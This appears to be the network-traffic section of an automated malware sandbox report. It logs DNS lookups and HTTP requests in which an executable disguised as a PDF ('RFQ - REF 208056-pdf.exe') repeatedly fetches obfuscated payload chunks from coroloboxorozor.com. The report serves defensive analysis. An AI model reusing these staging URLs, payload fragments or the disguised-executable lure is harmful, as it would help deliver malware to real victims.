                                                                                                                                         Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                                                                                                                         Feb 25, 2021 15:14:52.286699057 CET | 8.8.8.8 | 192.168.2.7 | 0xbfac | No error (0) | coroloboxorozor.com |  | 172.67.172.17 | A (IP address) | IN (0x0001)
                                                                                                                                         Feb 25, 2021 15:14:52.286699057 CET | 8.8.8.8 | 192.168.2.7 | 0xbfac | No error (0) | coroloboxorozor.com |  | 104.21.71.230 | A (IP address) | IN (0x0001)
                                                                                                                                         Feb 25, 2021 15:15:48.544307947 CET | 8.8.8.8 | 192.168.2.7 | 0x3f47 | No error (0) | coroloboxorozor.com |  | 172.67.172.17 | A (IP address) | IN (0x0001)
                                                                                                                                         Feb 25, 2021 15:15:48.544307947 CET | 8.8.8.8 | 192.168.2.7 | 0x3f47 | No error (0) | coroloboxorozor.com |  | 104.21.71.230 | A (IP address) | IN (0x0001)
                                                                                                                                         Feb 25, 2021 15:15:59.812334061 CET | 8.8.8.8 | 192.168.2.7 | 0x6eb5 | No error (0) | coroloboxorozor.com |  | 172.67.172.17 | A (IP address) | IN (0x0001)
                                                                                                                                         Feb 25, 2021 15:15:59.812334061 CET | 8.8.8.8 | 192.168.2.7 | 0x6eb5 | No error (0) | coroloboxorozor.com |  | 104.21.71.230 | A (IP address) | IN (0x0001)

                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                        • coroloboxorozor.com

                                                                                                                                        HTTP Packets

                                                                                                                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                         0 | 192.168.2.7 | 49708 | 172.67.172.17 | 80 | C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe
                                                                                                                                         Timestamp | kBytes transferred | Direction | Data
                                                                                                                                         Feb 25, 2021 15:14:52.365430117 CET | 487 | OUT | GET /base/4FDB764474638ADF12639B4DA858CE81.html HTTP/1.1
                                                                                                                                        Host: coroloboxorozor.com
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                         Feb 25, 2021 15:14:52.465615988 CET | 489 | IN | HTTP/1.1 200 OK
                                                                                                                                        Date: Thu, 25 Feb 2021 14:14:52 GMT
                                                                                                                                        Content-Type: text/html
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Set-Cookie: __cfduid=dbc716cc65372234f1ff492153c944e7d1614262492; expires=Sat, 27-Mar-21 14:14:52 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                                                                                                                        Last-Modified: Thu, 25 Feb 2021 07:33:02 GMT
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                        cf-request-id: 087b23f4f40000d91da5a73000000001
                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=%2FF5NnE%2BgarnN6Z0huU8XXpBQ0dnO0ggOWrdiWCHEm6e78UiW05FjIBEBksZjCyfVM7jQN6tDXJOj%2FG3olHBE2SNojcX9Q2YVP3GqDaK9ySqVZJhb"}],"group":"cf-nel","max_age":604800}
                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                        Server: cloudflare
                                                                                                                                        CF-RAY: 627209018f02d91d-AMS
                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                        Data Raw: 37 63 37 39 0d 0a 3c 70 3e 69 69 59 49 62 59 63 75 75 59 62 59 58 59 62 59 62 59 62 59 75 59 62 59 62 59 62 59 56 4a 4a 59 56 4a 4a 59 62 59 62 59 63 43 75 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 54 75 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 63 56 43 59 62 59 62 59 62 59 63 75 59 58 63 59 63 43 54 59 63 75 59 62 59 63 43 62 59 49 59 56 62 4a 59 58 58 59 63 43 75 59 63 59 69 54 59 56 62 4a 59 58 58 59 43 75 59 63 62 75 59 63 62 4a 59 63 63 4a 59 58 56 59 63 63 56 59 63 63 75 59 63 63 63 59 63 62 58 59 63 63 75 59 49 69 59 63 62 49 59 58 56 59 49 49 59 49 69 59 63 63 62 59 63 63 62 59 63 63 63 59 63 63 54 59 58 56 59 49 43 59 63 62 63 59 58 56 59 63 63 75 59 63 63 69 59 63 63 62 59 58 56 59 63 62 4a 59 63 63 62 59 58 56 59 54 43 59 69 49 59 43 58 59 58 56 59 63 62 49 59 63 63 63 59 63 62 62 59 63 62 63 59 75 54 59 63 58 59 63 58 59 63 62 59 58 54 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 43 62 59 54 49 59 62 59 62 59 69 54 59 63 59 58 59 62 59 69 54 59 63 75 56 59 75 63 59 63 43 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 56 56 75 59 62 59 58 75 59 62 59 63 63 59 63 59 43 62 59 62 59 62 59 63 75 56 59 63 62 59 62 59 62 59 54 59 62 59 62 59 62 59 62 59 62 59 62 59 63 75
                                                                                                                                        Data Ascii: 7c79<p>iiYIbYcuuYbYXYbYbYbYuYbYbYbYVJJYVJJYbYbYcCuYbYbYbYbYbYbYbYTuYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYcVCYbYbYbYcuYXcYcCTYcuYbYcCbYIYVbJYXXYcCuYcYiTYVbJYXXYCuYcbuYcbJYccJYXVYccVYccuYcccYcbXYccuYIiYcbIYXVYIIYIiYccbYccbYcccYccTYXVYICYcbcYXVYccuYcciYccbYXVYcbJYccbYXVYTCYiIYCXYXVYcbIYcccYcbbYcbcYuTYcXYcXYcbYXTYbYbYbYbYbYbYbYCbYTIYbYbYiTYcYXYbYiTYcuVYucYcCbYbYbYbYbYbYbYbYbYVVuYbYXuYbYccYcYCbYbYbYcuVYcbYbYbYTYbYbYbYbYbYbYcu
                                                                                                                                         Feb 25, 2021 15:14:53.094329119 CET | 1558 | OUT | GET /base/67CF952D671D30AE6DA37F3E241170D6.html HTTP/1.1
                                                                                                                                        Host: coroloboxorozor.com
                                                                                                                                         Feb 25, 2021 15:14:53.167872906 CET | 1563 | IN | HTTP/1.1 200 OK
                                                                                                                                        Date: Thu, 25 Feb 2021 14:14:53 GMT
                                                                                                                                        Content-Type: text/html
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Set-Cookie: __cfduid=dc1d1248b966ca8bd7311a77a9a6eb6681614262493; expires=Sat, 27-Mar-21 14:14:53 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                                                                                                                        Last-Modified: Thu, 25 Feb 2021 07:33:05 GMT
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                        cf-request-id: 087b23f7c90000d91da9962000000001
                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=pIT2Oudj%2FuhP%2FFWSxVf6Gu5wWaLl71LKEoBxM40092Y1aQuhoOPtR4cwTTZdDueUi4qbeBV%2B4ZWoxvRlFqkIs2oXJBbMt2opYM24wYEztWMHkL5E"}],"group":"cf-nel","max_age":604800}
                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                        Server: cloudflare
                                                                                                                                        CF-RAY: 627209060db9d91d-AMS
                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                        Data Raw: 33 34 36 37 0d 0a 3c 70 3e 59 56 75 59 63 4a 43 59 56 62 56 59 56 56 49 59 58 75 59 49 62 59 63 43 43 59 63 69 69 59 56 63 49 59 75 58 59 63 56 4a 59 63 75 4a 59 56 63 4a 59 56 58 58 59 75 75 59 63 43 4a 59 56 56 59 63 49 62 59 56 4a 63 59 63 69 58 59 56 4a 4a 59 56 58 4a 59 54 56 59 63 62 69 59 63 49 69 59 69 63 59 63 75 49 59 56 58 4a 59 75 69 59 63 63 63 59 63 49 54 59 56 4a 63 59 54 75 59 63 63 49 59 63 49 58 59 63 43 59 54 4a 59 63 54 63 59 56 49 59 56 62 49 59 54 63 59 56 58 59 56 4a 59 75 58 59 63 58 69 59 63 54 59 49 62 59 63 63 75 59 63 75 58 59 43 4a 59 63 43 62 59 56 4a 59 63 63 69 59 69 43 59 63 54 43 59 54 49 59 63 54 63 59 58 4a 59 63 62 4a 59 63 69 62 59 56 58 69 59 58 43 59 63 56 58 59 63 75 75 59 56 56 75 59 56 58 69 59 4a 63 59 63 54 58 59 56 58 49 59 56 56 54 59 56 4a 58 59 56 62 54 59 75 62 59 56 58 54 59 63 63 58 59 63 54 69 59 63 62 58 59 56 4a 58 59 63 69 4a 59 69 63 59 56 4a 4a 59 63 58 43 59 63 56 62 59 4a 4a 59 56 75 69 59 63 62 43 59 43 4a 59 63 69 59 56 4a 62 59 4a 56 59 75 49 59 69 43 59 54 4a 59 75 58 59 58 54 59 63 56 59 63 69 69 59 63 56 75 59 63 56 63 59 56 75 69 59 56 75 54 59 63 49 75 59 63 43 69 59 63 49 75 59 63 43 69 59 49 75 59 75 58 59 58 56 59 56 56 69 59 43 43 59 58 58 59 56 58 59 63 69 56 59 63 62 4a 59 4a 75 59 63 54 56 59 63 63 58 59 63 56 59 56 63 58 59 63 56 54 59 69 58 59 63 75 59 56 56 69 59 63 62 75 59 54
                                                                                                                                        Data Ascii: 3467<p>YVuYcJCYVbVYVVIYXuYIbYcCCYciiYVcIYuXYcVJYcuJYVcJYVXXYuuYcCJYVVYcIbYVJcYciXYVJJYVXJYTVYcbiYcIiYicYcuIYVXJYuiYcccYcITYVJcYTuYccIYcIXYcCYTJYcTcYVIYVbIYTcYVXYVJYuXYcXiYcTYIbYccuYcuXYCJYcCbYVJYcciYiCYcTCYTIYcTcYXJYcbJYcibYVXiYXCYcVXYcuuYVVuYVXiYJcYcTXYVXIYVVTYVJXYVbTYubYVXTYccXYcTiYcbXYVJXYciJYicYVJJYcXCYcVbYJJYVuiYcbCYCJYciYVJbYJVYuIYiCYTJYuXYXTYcVYciiYcVuYcVcYVuiYVuTYcIuYcCiYcIuYcCiYIuYuXYXVYVViYCCYXXYVXYciVYcbJYJuYcTVYccXYcVYVcXYcVTYiXYcuYVViYcbuYT
                                                                                                                                         Feb 25, 2021 15:14:55.763298035 CET | 2900 | OUT | GET /base/7DD0ECB3FED3970A09258155874027F0.html HTTP/1.1
                                                                                                                                        Host: coroloboxorozor.com
                                                                                                                                         Feb 25, 2021 15:14:55.834506035 CET | 2906 | IN | HTTP/1.1 200 OK
                                                                                                                                        Date: Thu, 25 Feb 2021 14:14:55 GMT
                                                                                                                                        Content-Type: text/html
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Set-Cookie: __cfduid=d1848e1b579e40cb487555f36131c8c101614262495; expires=Sat, 27-Mar-21 14:14:55 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                                                                                                                        Last-Modified: Thu, 25 Feb 2021 07:33:06 GMT
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                        cf-request-id: 087b24023a0000d91d4abe6000000001
                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=d9Avn1PVWM%2BKgoAD6JKLiOd1aVRNpKa8a066FcuerjeT1cYkfWodRURBItxf6pnQPTF4AuntOo%2Fn19VLIniyJuUktR1LfYhfv%2FIyWrYudzsrWyno"}],"group":"cf-nel","max_age":604800}
                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                        Server: cloudflare
                                                                                                                                        CF-RAY: 62720916b93fd91d-AMS
                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                        Data Raw: 31 31 31 64 0d 0a 3c 70 3e 58 69 59 62 59 63 62 56 59 62 59 63 63 43 59 62 59 63 63 62 59 62 59 63 63 43 59 62 59 49 49 59 62 59 63 63 62 59 62 59 63 62 54 59 62 59 63 63 43 59 62 59 63 56 63 59 62 59 63 63 43 59 62 59 63 62 4a 59 62 59 63 62 4a 59 62 59 63 62 75 59 62 59 63 62 43 59 62 59 58 69 59 62 59 63 62 63 59 62 59 58 69 59 62 59 63 63 62 59 62 59 63 63 75 59 62 59 63 63 69 59 62 59 63 63 56 59 62 59 63 63 75 59 62 59 63 62 63 59 62 59 63 63 49 59 62 59 63 63 54 59 62 59 58 69 59 62 59 63 63 75 59 62 59 58 69 59 62 59 63 62 49 59 62 59 63 63 62 59 62 59 63 63 75 59 62 59 49 43 59 62 59 63 62 4a 59 62 59 63 62 58 59 62 59 63 56 62 59 62 59 63 62 49 59 62 59 63 56 63 59 62 59 63 56 56 59 62 59 63 62 56 59 62 59 63 62 69 59 62 59 63 56 56 59 62 59 58 69 59 62 59 63 63 43 59 62 59 58 69 59 62 59 49 43 59 62 59 49 49 59 62 59 63 62 63 59 62 59 63 62 4a 59 62 59 49 69 59 62 59 63 62 62 59 62 59 63 63 69 59 62 59 63 63 54 59 62 59 63 62 54 59 62 59 63 62 49 59 62 59 63 63 69 59 62 59 63 63 4a 59 62 59 58 69 59 62 59 63 62 4a 59 62 59 58 69 59 62 59 63 63 56 59 62 59 63 63 75 59 62 59 63 63 54 59 62 59 63 63 63 59 62 59 63 62 63 59 62 59 63 63 56 59 62 59 63 62 75 59 62 59 63 62 54 59 62 59 49 69 59 62 59 63 63 4a 59 62 59 63 62 75 59 62 59 58 69 59 62 59 49 49 59 62 59 58 69 59 62 59 63 56 63 59 62 59 63 56 63 59 62 59 49 49 59 62 59 63 63 43 59 62 59 63
                                                                                                                                        Data Ascii: 111d<p>XiYbYcbVYbYccCYbYccbYbYccCYbYIIYbYccbYbYcbTYbYccCYbYcVcYbYccCYbYcbJYbYcbJYbYcbuYbYcbCYbYXiYbYcbcYbYXiYbYccbYbYccuYbYcciYbYccVYbYccuYbYcbcYbYccIYbYccTYbYXiYbYccuYbYXiYbYcbIYbYccbYbYccuYbYICYbYcbJYbYcbXYbYcVbYbYcbIYbYcVcYbYcVVYbYcbVYbYcbiYbYcVVYbYXiYbYccCYbYXiYbYICYbYIIYbYcbcYbYcbJYbYIiYbYcbbYbYcciYbYccTYbYcbTYbYcbIYbYcciYbYccJYbYXiYbYcbJYbYXiYbYccVYbYccuYbYccTYbYcccYbYcbcYbYccVYbYcbuYbYcbTYbYIiYbYccJYbYcbuYbYXiYbYIIYbYXiYbYcVcYbYcVcYbYIIYbYccCYbYc


Session ID: 1 | Source IP: 192.168.2.7 | Source Port: 49730 | Destination IP: 172.67.172.17 | Destination Port: 80 | Process: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe

Timestamp: Feb 25, 2021 15:15:48.726012945 CET | kBytes transferred: 3693 | Direction: OUT | Data:
GET /base/4FDB764474638ADF12639B4DA858CE81.html HTTP/1.1
Host: coroloboxorozor.com
Connection: Keep-Alive

Timestamp: Feb 25, 2021 15:15:48.804352999 CET | kBytes transferred: 3694 | Direction: IN | Data:
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2021 14:15:48 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d813b895a9bf821e6da245c90df838df11614262548; expires=Sat, 27-Mar-21 14:15:48 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
Last-Modified: Thu, 25 Feb 2021 07:33:02 GMT
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
CF-Cache-Status: DYNAMIC
cf-request-id: 087b24d11b0000c7718b34d000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=PazrufPZj9Y9cQ00m1b5FirjAGFQlSdy6kmLvX362GlDWjOHJEDCjGpVC1z9IFFdJOFgc7%2BLMP%2FyNeqxAhxNAPUxW812wt2wJdn2uWTHXLeKyKSY"}],"group":"cf-nel","max_age":604800}
NEL: {"max_age":604800,"report_to":"cf-nel"}
Server: cloudflare
CF-RAY: 62720a61c95ac771-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                        Data Raw: 63 37 39 0d 0a 3c 70 3e 69 69 59 49 62 59 63 75 75 59 62 59 58 59 62 59 62 59 62 59 75 59 62 59 62 59 62 59 56 4a 4a 59 56 4a 4a 59 62 59 62 59 63 43 75 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 54 75 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 63 56 43 59 62 59 62 59 62 59 63 75 59 58 63 59 63 43 54 59 63 75 59 62 59 63 43 62 59 49 59 56 62 4a 59 58 58 59 63 43 75 59 63 59 69 54 59 56 62 4a 59 58 58 59 43 75 59 63 62 75 59 63 62 4a 59 63 63 4a 59 58 56 59 63 63 56 59 63 63 75 59 63 63 63 59 63 62 58 59 63 63 75 59 49 69 59 63 62 49 59 58 56 59 49 49 59 49 69 59 63 63 62 59 63 63 62 59 63 63 63 59 63 63 54 59 58 56 59 49 43 59 63 62 63 59 58 56 59 63 63 75 59 63 63 69 59 63 63 62 59 58 56 59 63 62 4a 59 63 63 62 59 58 56 59 54 43 59 69 49 59 43 58 59 58 56 59 63 62 49 59 63 63 63 59 63 62 62 59 63 62 63 59 75 54 59 63 58 59 63 58 59 63 62 59 58 54 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 43 62 59 54 49 59 62 59 62 59 69 54 59 63 59 58 59 62 59 69 54 59 63 75 56 59 75 63 59 63 43 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 62 59 56 56 75 59 62 59 58 75 59 62 59 63 63 59 63 59 43 62 59 62 59 62 59 63 75 56 59 63 62 59 62 59 62 59 54 59 62 59 62 59 62 59 62 59 62 59 62 59 63 75 56 59 63
                                                                                                                                        Data Ascii: c79<p>iiYIbYcuuYbYXYbYbYbYuYbYbYbYVJJYVJJYbYbYcCuYbYbYbYbYbYbYbYTuYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYbYcVCYbYbYbYcuYXcYcCTYcuYbYcCbYIYVbJYXXYcCuYcYiTYVbJYXXYCuYcbuYcbJYccJYXVYccVYccuYcccYcbXYccuYIiYcbIYXVYIIYIiYccbYccbYcccYccTYXVYICYcbcYXVYccuYcciYccbYXVYcbJYccbYXVYTCYiIYCXYXVYcbIYcccYcbbYcbcYuTYcXYcXYcbYXTYbYbYbYbYbYbYbYCbYTIYbYbYiTYcYXYbYiTYcuVYucYcCbYbYbYbYbYbYbYbYbYVVuYbYXuYbYccYcYCbYbYbYcuVYcbYbYbYTYbYbYbYbYbYbYcuVYc
Timestamp: Feb 25, 2021 15:15:49.311249971 CET | kBytes transferred: 4754 | Direction: OUT | Data:
GET /base/67CF952D671D30AE6DA37F3E241170D6.html HTTP/1.1
Host: coroloboxorozor.com

Timestamp: Feb 25, 2021 15:15:49.389533043 CET | kBytes transferred: 4755 | Direction: IN | Data:
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2021 14:15:49 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d18de9b56a7690571ecc8f4558e674fa71614262549; expires=Sat, 27-Mar-21 14:15:49 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
Last-Modified: Thu, 25 Feb 2021 07:33:05 GMT
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
CF-Cache-Status: DYNAMIC
cf-request-id: 087b24d3630000c7717302d000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=F9rBsfub1Wxg0kIcZakTfo%2FSW7h0mYi%2Fyd%2F%2BCqiJxMq%2FQhMZtGuoUUZCenUkXDaKygPANMS29pwBOerGZGBYQg0puO4hFwNDm2SjefApgSQVWfqi"}],"group":"cf-nel","max_age":604800}
NEL: {"max_age":604800,"report_to":"cf-nel"}
Server: cloudflare
CF-RAY: 62720a656f75c771-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                        Data Raw: 33 34 36 37 0d 0a 3c 70 3e 59 56 75 59 63 4a 43 59 56 62 56 59 56 56 49 59 58 75 59 49 62 59 63 43 43 59 63 69 69 59 56 63 49 59 75 58 59 63 56 4a 59 63 75 4a 59 56 63 4a 59 56 58 58 59 75 75 59 63 43 4a 59 56 56 59 63 49 62 59 56 4a 63 59 63 69 58 59 56 4a 4a 59 56 58 4a 59 54 56 59 63 62 69 59 63 49 69 59 69 63 59 63 75 49 59 56 58 4a 59 75 69 59 63 63 63 59 63 49 54 59 56 4a 63 59 54 75 59 63 63 49 59 63 49 58 59 63 43 59 54 4a 59 63 54 63 59 56 49 59 56 62 49 59 54 63 59 56 58 59 56 4a 59 75 58 59 63 58 69 59 63 54 59 49 62 59 63 63 75 59 63 75 58 59 43 4a 59 63 43 62 59 56 4a 59 63 63 69 59 69 43 59 63 54 43 59 54 49 59 63 54 63 59 58 4a 59 63 62 4a 59 63 69 62 59 56 58 69 59 58 43 59 63 56 58 59 63 75 75 59 56 56 75 59 56 58 69 59 4a 63 59 63 54 58 59 56 58 49 59 56 56 54 59 56 4a 58 59 56 62 54 59 75 62 59 56 58 54 59 63 63 58 59 63 54 69 59 63 62 58 59 56 4a 58 59 63 69 4a 59 69 63 59 56 4a 4a 59 63 58 43 59 63 56 62 59 4a 4a 59 56 75 69 59 63 62 43 59 43 4a 59 63 69 59 56 4a 62 59 4a 56 59 75 49 59 69 43 59 54 4a 59 75 58 59 58 54 59 63 56 59 63 69 69 59 63 56 75 59 63 56 63 59 56 75 69 59 56 75 54 59 63 49 75 59 63 43 69 59 63 49 75 59 63 43 69 59 49 75 59 75 58 59 58 56 59 56 56 69 59 43 43 59 58 58 59 56 58 59 63 69 56 59 63 62 4a 59 4a 75 59 63 54 56 59 63 63 58 59 63 56 59 56 63 58 59 63 56 54 59 69 58 59 63 75 59 56 56 69 59 63
                                                                                                                                        Data Ascii: 3467<p>YVuYcJCYVbVYVVIYXuYIbYcCCYciiYVcIYuXYcVJYcuJYVcJYVXXYuuYcCJYVVYcIbYVJcYciXYVJJYVXJYTVYcbiYcIiYicYcuIYVXJYuiYcccYcITYVJcYTuYccIYcIXYcCYTJYcTcYVIYVbIYTcYVXYVJYuXYcXiYcTYIbYccuYcuXYCJYcCbYVJYcciYiCYcTCYTIYcTcYXJYcbJYcibYVXiYXCYcVXYcuuYVVuYVXiYJcYcTXYVXIYVVTYVJXYVbTYubYVXTYccXYcTiYcbXYVJXYciJYicYVJJYcXCYcVbYJJYVuiYcbCYCJYciYVJbYJVYuIYiCYTJYuXYXTYcVYciiYcVuYcVcYVuiYVuTYcIuYcCiYcIuYcCiYIuYuXYXVYVViYCCYXXYVXYciVYcbJYJuYcTVYccXYcVYVcXYcVTYiXYcuYVViYc
Timestamp: Feb 25, 2021 15:16:11.567480087 CET | kBytes transferred: 10607 | Direction: OUT | Data:
GET /base/7DD0ECB3FED3970A09258155874027F0.html HTTP/1.1
Host: coroloboxorozor.com

Timestamp: Feb 25, 2021 15:16:11.687016964 CET | kBytes transferred: 10609 | Direction: IN | Data:
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2021 14:16:11 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d99f25c7b934921b734b25839dd3e3f901614262571; expires=Sat, 27-Mar-21 14:16:11 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
Last-Modified: Thu, 25 Feb 2021 07:33:06 GMT
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
CF-Cache-Status: DYNAMIC
cf-request-id: 087b252a520000c77181aa5000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=lpWI3VLJpMqYtBz4v3zyxdt7RZhZoY1q5FUpB9Ec0v9%2FYrEqoFk6R1aiCLds95qfe2iodPO3A4uNHxwFJ7wK2QekkuhefnXOXBUuTZjuz%2Bgg6fHL"}],"group":"cf-nel","max_age":604800}
NEL: {"max_age":604800,"report_to":"cf-nel"}
Server: cloudflare
CF-RAY: 62720af08cb8c771-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                        Data Raw: 35 30 63 31 0d 0a 3c 70 3e 58 69 59 62 59 63 62 56 59 62 59 63 63 43 59 62 59 63 63 62 59 62 59 63 63 43 59 62 59 49 49 59 62 59 63 63 62 59 62 59 63 62 54 59 62 59 63 63 43 59 62 59 63 56 63 59 62 59 63 63 43 59 62 59 63 62 4a 59 62 59 63 62 4a 59 62 59 63 62 75 59 62 59 63 62 43 59 62 59 58 69 59 62 59 63 62 63 59 62 59 58 69 59 62 59 63 63 62 59 62 59 63 63 75 59 62 59 63 63 69 59 62 59 63 63 56 59 62 59 63 63 75 59 62 59 63 62 63 59 62 59 63 63 49 59 62 59 63 63 54 59 62 59 58 69 59 62 59 63 63 75 59 62 59 58 69 59 62 59 63 62 49 59 62 59 63 63 62 59 62 59 63 63 75 59 62 59 49 43 59 62 59 63 62 4a 59 62 59 63 62 58 59 62 59 63 56 62 59 62 59 63 62 49 59 62 59 63 56 63 59 62 59 63 56 56 59 62 59 63 62 56 59 62 59 63 62 69 59 62 59 63 56 56 59 62 59 58 69 59 62 59 63 63 43 59 62 59 58 69 59 62 59 49 43 59 62 59 49 49 59 62 59 63 62 63 59 62 59 63 62 4a 59 62 59 49 69 59 62 59 63 62 62 59 62 59 63 63 69 59 62 59 63 63 54 59 62 59 63 62 54 59 62 59 63 62 49 59 62 59 63 63 69 59 62 59 63 63 4a 59 62 59 58 69 59 62 59 63 62 4a 59 62 59 58 69 59 62 59 63 63 56 59 62 59 63 63 75 59 62 59 63 63 54 59 62 59 63 63 63 59 62 59 63 62 63 59 62 59 63 63 56 59 62 59 63 62 75 59 62 59 63 62 54 59 62 59 49 69 59 62 59 63 63 4a 59 62 59 63 62 75 59 62 59 58 69 59 62 59 49 49 59 62 59 58 69 59 62 59 63 56 63 59 62 59 63 56 63 59 62 59 49 49 59 62 59 63 63 43 59 62 59 63 62 63
                                                                                                                                        Data Ascii: 50c1<p>XiYbYcbVYbYccCYbYccbYbYccCYbYIIYbYccbYbYcbTYbYccCYbYcVcYbYccCYbYcbJYbYcbJYbYcbuYbYcbCYbYXiYbYcbcYbYXiYbYccbYbYccuYbYcciYbYccVYbYccuYbYcbcYbYccIYbYccTYbYXiYbYccuYbYXiYbYcbIYbYccbYbYccuYbYICYbYcbJYbYcbXYbYcVbYbYcbIYbYcVcYbYcVVYbYcbVYbYcbiYbYcVVYbYXiYbYccCYbYXiYbYICYbYIIYbYcbcYbYcbJYbYIiYbYcbbYbYcciYbYccTYbYcbTYbYcbIYbYcciYbYccJYbYXiYbYcbJYbYXiYbYccVYbYccuYbYccTYbYcccYbYcbcYbYccVYbYcbuYbYcbTYbYIiYbYccJYbYcbuYbYXiYbYIIYbYXiYbYcVcYbYcVcYbYIIYbYccCYbYcbc


Session ID: 2 | Source IP: 192.168.2.7 | Source Port: 49736 | Destination IP: 172.67.172.17 | Destination Port: 80 | Process: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exe

Timestamp: Feb 25, 2021 15:15:59.952835083 CET | kBytes transferred: 6457 | Direction: OUT | Data:
GET /base/4FDB764474638ADF12639B4DA858CE81.html HTTP/1.1
Host: coroloboxorozor.com
Connection: Keep-Alive

Timestamp: Feb 25, 2021 15:16:00.047290087 CET | kBytes transferred: 7223 | Direction: IN | Data:
HTTP/1.1 200 OK
Date: Thu, 25 Feb 2021 14:16:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d13aa7a57fad137eafa360a7b8317c40f1614262560; expires=Sat, 27-Mar-21 14:16:00 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
Last-Modified: Thu, 25 Feb 2021 07:33:02 GMT
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
CF-Cache-Status: DYNAMIC
cf-request-id: 087b24fcf600009d18e438a000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=T59UE2gtmbBAwQ9hiT5klyZBG5tHeXeVdI7CgwhIXWpx%2FFZjv5VKs2nR8rXvKQMDCA66r%2F1Y0S%2BeLuANgkOpsNmIEJ8tO%2BWOG494x%2BEeGt5RMPXm"}],"max_age":604800,"group":"cf-nel"}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 62720aa7e9419d18-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
